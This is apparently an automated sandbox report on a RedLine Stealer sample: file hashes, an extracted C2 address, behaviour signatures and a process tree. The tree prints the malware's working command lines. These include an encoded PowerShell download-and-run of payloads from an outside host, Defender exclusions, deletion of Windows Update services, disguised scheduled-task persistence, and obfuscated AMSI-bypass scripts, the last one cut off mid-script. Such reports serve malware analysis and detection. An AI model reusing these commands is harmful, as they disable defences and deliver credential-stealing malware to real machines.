Analysis

  • max time kernel
    42s
  • max time network
    97s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/01/2023, 01:16

General

  • Target

    b3e4aa7167322e62d0ab56f0ba11c3adfef87eb1.exe

  • Size

    119KB

  • MD5

    d9a2313ebd1f9d41687e127028bc230e

  • SHA1

    b3e4aa7167322e62d0ab56f0ba11c3adfef87eb1

  • SHA256

    a5d8eac92699a2e8870775b0eb150bb3fdedf4e86f6b0a26a122ad5f7e9fd3c2

  • SHA512

    4ee00a77199e82d63967f9731a5dd101f2dcec52584337dff306c2d5b71dfa4d83ac473617da0b022d301f8878b5cd835b18a35603fbe9dd7682064dc30264be

  • SSDEEP

    3072:EcJw0ADKnZ1bEGSzLu1XlEWb3MeUn3PAngc13Aa99sXcc:/W3IZ1bgQlExeUcN99sXcc

Malware Config

Extracted

Family

redline

Botnet

1

C2

107.182.129.73:21733

Attributes
  • auth_value

    3a5bb0917495b4312d052a0b8977d2bb

Signatures

  • Modifies security service 2 TTPs 5 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 4 IoCs
  • Stops running service(s) 3 TTPs
  • Uses the VBS compiler for execution 1 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Launches sc.exe 5 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 32 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:596
      • C:\Windows\System32\dllhost.exe
        C:\Windows\System32\dllhost.exe /Processid:{79bf586a-4cf1-4f88-b468-ee4a2425786f}
        2⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1944
    • C:\Windows\Explorer.EXE
      C:\Windows\Explorer.EXE
      1⤵
        PID:3080
        • C:\Users\Admin\AppData\Local\Temp\b3e4aa7167322e62d0ab56f0ba11c3adfef87eb1.exe
          "C:\Users\Admin\AppData\Local\Temp\b3e4aa7167322e62d0ab56f0ba11c3adfef87eb1.exe"
          2⤵
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:3576
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:4032
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdABhACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYwBqAHIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAegBjAHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAYgB4AHoAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcALAAgADwAIwBhAGEAYQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGMAZAB6ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGwAcwBqACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAEMANABMAG8AYQBkAGUAcgAuAGUAeABlACcAKQApADwAIwB3AGQAcwAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBuAGUAdwAyAC4AZQB4AGUAJwAsACAAPAAjAGoAYgBxACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcQB6AGEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYwBlAGMAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQApADwAIwBtAGIAegAjAD4AOwAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAcwA6AC8ALwBjAG8AbgBuAGUAYwB0ADIAbQBlAC4AaABvAHAAdABvAC4AbwByAGcALwB3AG8AdwAvADEALwAyAC8AMwAvADQALwA1AC8ANgAvADcALwBTAHkAcwBBAHAAcAAuAGUAeABlACcALAAgADwAIwBqAHcAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAGYAcQB0ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHcAYgBhACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApACkAPAAjAHUAYQB3ACMAPgA7ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAbwBuAG4AZQBjAHQAMgBtAGUALgBoAG8AcAB0AG8ALgBvAHIAZwAvAHcAbwB3AC8AMQAvADIALwAzAC8ANAAvADUALwA2AC8ANwAvAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcALAAgADwAIwBoAGkAYgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAAPAAjAHQAcAB2ACMAPgAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAHQAcgBzACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAbQBhAHIAdABEAGUAZgBSAHUAbgAuAGUAeABlACcAKQApADwAIwBqAGwAcAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBkAGMAcgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZAB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAQwA0AEwAbwBhAGQAZQByAC4AZQB4AGUAJwApADwAIwBoAHgAZwAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBwAGcAeQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAbQBkAGYAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAbgBlAHcAMgAuAGUAeABlACcAKQA8ACMAdgBoAGUAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZQBxAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABkACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAFMAeQBzAEEAcABwAC4AZQB4AGUAJwApADwAIwB5AGkAbQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGEAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABrAGoAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAUwBtAGEAcgB0AEQAZQBmAFIAdQBuAC4AZQB4AGUAJwApADwAIwBoAGYAZAAjAD4A"
              4⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:4840
              • C:\Users\Admin\AppData\Local\Temp\C4Loader.exe
                "C:\Users\Admin\AppData\Local\Temp\C4Loader.exe"
                5⤵
                • Executes dropped EXE
                PID:2016
              • C:\Users\Admin\AppData\Local\Temp\new2.exe
                "C:\Users\Admin\AppData\Local\Temp\new2.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious use of WriteProcessMemory
                PID:4692
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
                  6⤵
                  • Suspicious behavior: EnumeratesProcesses
                  PID:3544
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 4692 -s 492
                  6⤵
                  • Program crash
                  PID:4748
              • C:\Users\Admin\AppData\Local\Temp\SysApp.exe
                "C:\Users\Admin\AppData\Local\Temp\SysApp.exe"
                5⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                PID:1100
              • C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe
                "C:\Users\Admin\AppData\Local\Temp\SmartDefRun.exe"
                5⤵
                • Suspicious use of NtCreateUserProcessOtherParentProcess
                • Drops file in Drivers directory
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Drops file in Program Files directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:384
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 256
            3⤵
            • Program crash
            PID:3844
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 280
            3⤵
            • Program crash
            PID:3532
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3576 -s 204
            3⤵
            • Program crash
            PID:5048
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1732
        • C:\Windows\System32\cmd.exe
          C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1872
          • C:\Windows\System32\sc.exe
            sc stop UsoSvc
            3⤵
            • Launches sc.exe
            PID:3204
          • C:\Windows\System32\sc.exe
            sc stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:544
          • C:\Windows\System32\sc.exe
            sc stop wuauserv
            3⤵
            • Launches sc.exe
            PID:4984
          • C:\Windows\System32\sc.exe
            sc stop bits
            3⤵
            • Launches sc.exe
            PID:1676
          • C:\Windows\System32\sc.exe
            sc stop dosvc
            3⤵
            • Launches sc.exe
            PID:4280
          • C:\Windows\System32\reg.exe
            reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
            3⤵
              PID:648
            • C:\Windows\System32\reg.exe
              reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
              3⤵
                PID:1660
              • C:\Windows\System32\reg.exe
                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
                3⤵
                • Modifies security service
                PID:1928
              • C:\Windows\System32\reg.exe
                reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
                3⤵
                  PID:4308
                • C:\Windows\System32\reg.exe
                  reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                  3⤵
                    PID:4032
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#thpqznhs#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'WindowsDefenderSmartScreenQC' /tr '''C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'WindowsDefenderSmartScreenQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefenderSmartScreenQC" /t REG_SZ /f /d 'C:\Program Files\WindowsDefenderQC\Defender\SmartScreenQC.exe' }
                  2⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4972
                • C:\Windows\System32\dialer.exe
                  C:\Windows\System32\dialer.exe
                  2⤵
                    PID:3844
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3576 -ip 3576
                  1⤵
                    PID:5044
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 3576 -ip 3576
                    1⤵
                      PID:4236
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3576 -ip 3576
                      1⤵
                        PID:4732
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 4692 -ip 4692
                        1⤵
                          PID:2504
                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:dGSCpnemYtFR{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$TilWmCipzrlAyZ,[Parameter(Position=1)][Type]$iJXHyVTZWW)$HNUszAIFSrl=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+''+'f'+''+'l'+'e'+[Char](99)+''+[Char](116)+''+'e'+''+[Char](100)+''+'D'+''+[Char](101)+'l'+[Char](101)+''+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+'n'+''+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+[Char](77)+''+'o'+'d'+'u'+'l'+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+'D'+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+''+'T'+''+[Char](121)+'p'+'e'+'',''+[Char](67)+''+'l'+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+[Char](80)+''+[Char](117)+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+'ea'+[Char](108)+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+'A'+''+[Char](110)+''+[Char](115)+'i'+'C'+''+'l'+''+[Char](97)+''+'s'+'s'+[Char](44)+''+[Char](65)+''+[Char](117)+''+'t'+'oC'+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$HNUszAIFSrl.DefineConstructor('R'+'T'+''+[Char](83)+'p'+[Char](101)+'ci'+'a'+''+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+'Hi'+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+[Char](105)+'g'+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$TilWmCipzrlAyZ).SetImplementationFlags(''+'R'+''+[Char](117)+'nti'+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');$HNUszAIFSrl.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+[Char](111)+'k'+[Char](101)+'',''+[Char](80)+'u'+[Char](98)+''+'l'+''+[Char](105)+'c'+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+','+'N'+'e'+''+'w'+''+'S'+''+[Char](108)+'o'+[Char](116)+',V'+'i'+''+[Char](114)+''+'t'+''+[Char](117)+''+[Char](97)+'l',$iJXHyVTZWW,$TilWmCipzrlAyZ).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+'ti'+[Char](109)+''+'e'+''+','+''+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $HNUszAIFSrl.CreateType();}$EcQxZYBsXqkbn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+'em'+[Char](46)+'d'+[Char](108)+'l')}).GetType(''+'M'+''+[Char](105)+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+''+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](69)+''+[Char](99)+''+[Char](81)+''+[Char](120)+''+[Char](90)+'Y'+[Char](66)+''+'s'+''+[Char](88)+''+[Char](113)+''+[Char](107)+''+[Char](98)+'n');$bwoCmGPBpyolpd=$EcQxZYBsXqkbn.GetMethod(''+'b'+'w'+[Char](111)+'Cm'+'G'+''+[Char](80)+'Bp'+[Char](121)+''+[Char](111)+''+[Char](108)+'p'+[Char](100)+'',[Reflection.BindingFlags]''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+'c'+','+[Char](83)+''+'t'+''+[Char](97)+''+'t'+''+'i'+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZKJgizzfaGsBJZoGyPj=dGSCpnemYtFR @([String])([IntPtr]);$oDkIRXxoaHZMsRJBKLtGsu=dGSCpnemYtFR @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$FFsDNZgcOTI=$EcQxZYBsXqkbn.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+'Mo'+'d'+'u'+[Char](108)+'e'+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+'l'+''+'e'+'').Invoke($Null,@([Object](''+'k'+'er'+'n'+''+[Char](101)+''+[Char](108)+'32'+[Char](46)+'d'+[Char](108)+''+[Char](108)+'')));$UKtwKKmwvTAHca=$bwoCmGPBpyolpd.Invoke($Null,@([Object]$FFsDNZgcOTI,[Object](''+[Char](76)+''+'o'+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+''+[Char](98)+'r'+'a'+''+[Char](114)+'y'+'A'+'')));$NfuMAvVOdRWrrnryL=$bwoCmGPBpyolpd.Invoke($Null,@([Object]$FFsDNZgcOTI,[Object]('V'+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+'a'+''+'l'+''+[Char](80)+'r'+[Char](111)+''+[Char](116)+''+'e'+''+'c'+''+[Char](116)+'')));$YvRdhtJ=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UKtwKKmwvTAHca,$ZKJgizzfaGsBJZoGyPj).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+'d'+[Char](108)+''+[Char](108)+'');$tscozUFZqzKZKjwkX=$bwoCmGPBpyolpd.Invoke($Null,@([Object]$YvRdhtJ,[Object](''+'A'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+'S'+''+[Char](99)+'a'+[Char](110)+'B'+[Char](117)+''+[Char](102)+''+[Char](102)+''+'e'+'r')));$OjNdjEACkb=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NfuMAvVOdRWrrnryL,$oDkIRXxoaHZMsRJBKLtGsu).Invoke($tscozUFZqzKZKjwkX,[uint32]8,4,[ref]$OjNdjEACkb);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$tscozUFZqzKZKjwkX,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($NfuMAvVOdRWrrnryL,$oDkIRXxoaHZMsRJBKLtGsu).Invoke($tscozUFZqzKZKjwkX,[uint32]8,0x20,[ref]$OjNdjEACkb);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+[Char](79)+'F'+'T'+''+'W'+''+'A'+''+'R'+'E').GetValue('d'+[Char](105)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](114)+''+[Char](115)+'t'+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)
                          1⤵
                          • Modifies data under HKEY_USERS
                          • Suspicious behavior: EnumeratesProcesses
                          PID:1948
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KnTRhvoBZlQI{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$AsHqYELRCbiHOe,[Parameter(Position=1)][Type]$WVAFOJCvMO)$kUpPbTxwRaJ=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+'e'+'f'+[Char](108)+''+[Char](101)+''+[Char](99)+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+[Char](101)+''+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('I'+[Char](110)+''+'M'+''+[Char](101)+''+'m'+''+'o'+''+[Char](114)+''+'y'+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e',$False).DefineType('My'+[Char](68)+''+[Char](101)+''+'l'+''+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+'e'+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+''+[Char](108)+'a'+'s'+''+[Char](115)+',P'+[Char](117)+''+[Char](98)+''+'l'+''+'i'+''+[Char](99)+''+[Char](44)+''+'S'+''+[Char](101)+''+[Char](97)+''+'l'+''+'e'+''+[Char](100)+''+','+''+'A'+'n'+[Char](115)+''+[Char](105)+'C'+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'A'+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+''+[Char](97)+'ss',[MulticastDelegate]);$kUpPbTxwRaJ.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+'p'+''+[Char](101)+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+'N'+[Char](97)+'m'+[Char](101)+''+[Char](44)+''+[Char](72)+'id'+[Char](101)+''+[Char](66)+'yS'+[Char](105)+''+'g'+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$AsHqYELRCbiHOe).SetImplementationFlags('R'+[Char](117)+''+'n'+''+'t'+''+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+''+'a'+''+[Char](110)+'a'+[Char](103)+''+[Char](101)+'d');$kUpPbTxwRaJ.DefineMethod(''+[Char](73)+'nvo'+[Char](107)+''+[Char](101)+'',''+[Char](80)+'ubl'+[Char](105)+''+'c'+','+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+[Char](103)+',N'+[Char](101)+''+'w'+'S'+'l'+'o'+'t'+''+[Char](44)+''+[Char](86)+''+[Char](105)+''+[Char](114)+''+'t'+'ua'+[Char](108)+'',$WVAFOJCvMO,$AsHqYELRCbiHOe).SetImplementationFlags(''+[Char](82)+''+'u'+''+'n'+''+[Char](116)+''+[Char](105)+''+'m'+'e'+','+''+[Char](77)+''+'a'+''+'n'+'a'+[Char](103)+''+[Char](101)+''+'d'+'');Write-Output $kUpPbTxwRaJ.CreateType();}$hkVGxsRCvWfEK=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+[Char](116)+'e'+[Char](109)+''+'.'+''+[Char](100)+''+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+'i'+[Char](99)+''+[Char](114)+''+[Char](111)+''+'s'+'o'+[Char](102)+''+[Char](116)+''+[Char](46)+''+[Char](87)+''+[Char](105)+'n3'+[Char](50)+''+'.'+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+'h'+''+[Char](107)+''+[Char](86)+''+[Char](71)+''+[Char](120)+''+'s'+''+[Char](82)+''+[Char](67)+'v'+'W'+''+[Char](102)+''+[Char](69)+''+'K'+'');$SjPYNVHEUdjTDu=$hkVGxsRCvWfEK.GetMethod(''+'S'+''+[Char](106)+''+'P'+''+[Char](89)+'NVH'+[Char](69)+''+[Char](85)+'d'+[Char](106)+''+'T'+''+[Char](68)+''+'u'+'',[Reflection.BindingFlags]'P'+[Char](117)+''+'b'+''+[Char](108)+''+'i'+'c,'+[Char](83)+''+'t'+''+'a'+''+'t'+''+[Char](105)+''+[Char](99)+'',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RvpkgrPvicMBxXyAlGN=KnTRhvoBZlQI @([String])([IntPtr]);$qGLejpLRcnsNjbicomptTu=KnTRhvoBZlQI @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$cQvuTYmpalZ=$hkVGxsRCvWfEK.GetMethod('G'+[Char](101)+''+'t'+'M'+'o'+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+'H'+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+'r'+''+[Char](110)+''+'e'+'l3'+[Char](50)+''+'.'+''+[Char](100)+'ll')));$YNgArAFlMPorjU=$SjPYNVHEUdjTDu.Invoke($Null,@([Object]$cQvuTYmpalZ,[Object]('L'+[Char](111)+''+'a'+''+'d'+''+[Char](76)+'i'+'b'+''+[Char](114)+''+[Char](97)+''+'r'+''+[Char](121)+''+[Char](65)+'')));$xvIqRqgqDflHaHqxn=$SjPYNVHEUdjTDu.Invoke($Null,@([Object]$cQvuTYmpalZ,[Object]('V'+'i'+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+'l'+'P'+[Char](114)+''+[Char](111)+''+[Char](116)+'e'+'c'+''+'t'+'')));$LnHlERh=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($YNgArAFlMPorjU,$RvpkgrPvicMBxXyAlGN).Invoke(''+'a'+'m'+'s'+''+'i'+'.'+'d'+''+[Char](108)+''+'l'+'');$XkggMzyefYGwaYDuN=$SjPYNVHEUdjTD